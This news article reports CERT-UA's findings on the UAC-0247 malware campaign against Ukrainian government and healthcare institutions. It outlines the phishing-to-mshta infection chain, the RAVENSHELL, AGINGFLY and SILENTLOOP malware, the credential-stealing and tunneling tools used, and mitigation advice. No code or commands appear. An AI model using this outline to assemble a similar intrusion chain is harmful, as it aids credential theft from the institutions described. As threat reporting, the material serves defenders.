The Computer Emergency Response Team of Ukraine, CERT-UA, has disclosed details of a malware campaign attributed to a threat cluster identified as UAC-0247. The activity, observed between March and April 2026, has primarily targeted government entities and municipal healthcare institutions, including clinics and emergency hospitals. The operation is designed to deploy malware capable of stealing sensitive data from Chromium based web browsers as well as WhatsApp, raising concerns over the exposure of critical administrative and personal communications within affected organizations.
According to the findings, the attack chain begins with a phishing email that presents itself as a humanitarian aid proposal. The message encourages recipients to click on a link that redirects them either to a legitimate website that has been compromised through a cross site scripting vulnerability or to a fake website generated with assistance from artificial intelligence tools. Regardless of the landing page, the objective remains the same, which is to trick users into downloading and executing a Windows Shortcut file. This file then triggers the execution of a remote HTML Application using the native Windows utility mshta.exe. Once executed, the application displays a decoy form to distract the victim while simultaneously retrieving a binary responsible for injecting shellcode into legitimate system processes such as runtimeBroker.exe.
Further analysis of the campaign reveals the use of a two stage loader mechanism. The second stage is implemented through a proprietary executable format that supports code and data sections, function imports from dynamic libraries, and relocation features. The final payload is further compressed and encrypted to avoid detection. One of the initial stagers identified in the campaign is a tool referred to as TCP reverse shell or its variant tracked as RAVENSHELL, which establishes a TCP connection with a remote management server and allows execution of commands on the infected host through cmd.exe. Alongside this, additional malware components such as AGINGFLY and a PowerShell based script known as SILENTLOOP have been deployed. SILENTLOOP is capable of executing commands, updating configuration automatically, and retrieving command and control server IP addresses from Telegram channels, with fallback mechanisms for alternative connection paths.
The AGINGFLY malware family, developed in C#, is designed to provide remote system control through WebSocket communication with a command and control server. It enables attackers to execute system commands, activate keylogging functions, download additional files, and deploy further payloads on compromised systems. Investigations covering approximately a dozen incidents indicate that the campaign is focused on reconnaissance, lateral movement across networks, and credential theft from WhatsApp and Chromium based browsers. This is achieved through the deployment of multiple open source tools including ChromElevator, which bypasses Chromium app bound encryption protections to extract cookies and saved passwords, ZAPiXDESK for decrypting WhatsApp Web databases, RustScan for network scanning, Ligolo Ng for tunneling reverse TCP and TLS connections, Chisel for traffic tunneling, and XMRig for cryptocurrency mining.
The investigation also found evidence suggesting that members of the Defense Forces of Ukraine may have been targeted, with malicious ZIP archives distributed through Signal messaging. These archives are designed to deploy AGINGFLY using DLL side loading techniques. To reduce exposure to such threats, recommendations include restricting execution of LNK, HTA, and JS files, as well as limiting the use of utilities such as mshta.exe, powershell.exe, and wscript.exe in controlled environments to minimize attack surfaces and prevent execution of malicious workflows.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
